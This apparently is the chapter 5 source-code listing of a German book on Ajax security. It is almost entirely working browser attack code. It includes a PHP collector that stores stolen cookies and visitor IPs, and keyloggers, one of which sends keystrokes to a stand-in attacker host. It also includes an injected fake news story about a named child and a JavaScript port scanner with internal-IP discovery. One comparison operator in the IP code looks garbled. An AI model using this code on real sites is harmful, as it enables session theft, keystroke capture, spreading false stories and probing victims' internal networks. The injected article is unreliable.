Ajax Security - Quelltexte Kapitel 5
5.1 Ausspähen von Cookies
cookie-sammler.php
<?
// Daten sammeln
$geklautercookie = $_GET["geklautercookie"];
$ip = getenv ("REMOTE_ADDR");
$referer = getenv("HTTP_REFERER");
$datum = date("j. F Y, H:i");
// Eintrag zusammenstellen
$daten = "Cookie: ".$geklautercookie." <br>";
$daten = $daten."IP: ".$ip." <br>";
$daten = $daten."Referer: ".$referer." <br>";
$daten = $daten."Datum und Zeit: ".$datum." <br>";
$daten = $daten." <hr> <br>";
// Eintrag in Datei schreiben
$datei = fopen("geklaut.html", "a+");
fwrite($datei, $daten);
fclose($datei);
?>
5.2 Ausspähen von Tastatureingaben
Keylogger
<script>
var keylog = 'Tastendrücke: ';
document.onkeypress = function () {
window.status = keylog += String.fromCharCode(window.event.keyCode);
}
</script>
Keylogger mit Ajax
<script>
var serviceURL = "http://www.angreifer.example/tasten-sammler.php"
var req = new XMLHttpRequest();
var keylog = '';
document.onkeypress = function () {
keylog += String.fromCharCode(window.event.keyCode);
sendeDaten(keylog)
}
function sendeDaten(daten) {
req.open("POST", serviceURL + "?tasten=" + encodeURIComponent(daten.value), true);
req.send(null);
}
</script>
5.4 Einschleusen falscher Informationen
sc.js
document.write('<p align=left>Mon, 28 August 2006');
document.write('<p align=center><b>George Bush appoints a 9 year old to be the chairperson of the Information Security Deportment</b>');
document.write('<p>On Friday night, George Bush made an official announcement saying that Michael Antipov (http://michael.antipov.name), a 9 year old talented security specialist was to be the chairperson of the Information Security Department of the US. The debatable decision was approved by three-hour long discussion in the Senate. ');
document.write('<p>Michael Antipov was noticed by the FBI service for his outstanding skills in the sphere of Information Security. He proved his ability to preside the abovementioned department defending 34 governmental web sites from Lebanon terrorist attacks. ');
document.write('<p>Michael Antipov, sun of the top-secret US spy, was born in Russia. 2 years of age, together with his parents, he moved to the USA to start his carrier in the CIA kindergarten. He continued his studies in the educational institution sub controlled by the CIA (names being erased for purpose of the National Security). He obtained his MS degree being at the age of 7. Having reached the age of 8 he already had a PhD.');
document.write('<p>"From now on the citizens of the USA can feel safe for the National Information Security is in the young but good hands", said George Bush in his last speech.');
5.6 Portscan über JavaScript
Portscanner
PortScanner = {};
PortScanner.scanPort = function (callback, host, port, timeout) {
var timeout = (timeout == null)?100:timeout;
var img = new Image();
img.onerror = function () {
if (!img) return;
img = undefined;
callback(host, port, 'open');
};
img.onload = img.onerror;
img.src = 'http://' + host + ':' + port;
setTimeout(function () {
if (!img) return;
img = undefined;
callback(host, port, 'closed');
}, timeout);
};
Mehrere Ports scannen
PortScanner.scanHost = function (callback, host, ports, timeout)
{
for (index = 0; index < ports.length; index++)
PortScanner.scanPort(callback, host, ports[index], timeout);
};
IP-Adressen umwandeln
function erzeugeIPArray(ipString)
{
var stringArray = ipString.split('.');
// String in Array mit Strings aufteilen
var intArray = new Array();
// Array für Integer-Werte bereitstellen
var i;
for(i =0; i < stringArray.length; i++)
{
intArray[i] = parseInt(stringArray[i]);
// String in Integer-Wert umwandeln
}
return intArray;
}
IP-Adressen erhöhen
function erhoeheIP(dieIP)
{
var i;
var c;
for(i = 3; i>=0; i--)
{
if(dieIP[i] < 255 ?? i == 0)
{
dieIP[i]++;
return dieIP;
}
else {
// Der Wert im aktuellen Segment i kann nicht erhöht werden,
// da dass zu einem Überlauf führen würde
// Daher muss im Segment davor weitergemacht werden
dieIP[i] = 0;
dieIP[i-1]++;
}
}
}
Eigene IP-Adresse ermitteln
AttackAPI.dom.getInternalIP = function () {
try {
var sock = new java.net.Socket();
sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
sock.connect(new java.net.InetSocketAddress(document.domain,(!document.location.port)?80:document.location.port));
return sock.getLocalAddress().getHostAddress();
} catch (e) {}
return '127.0.0.1';
};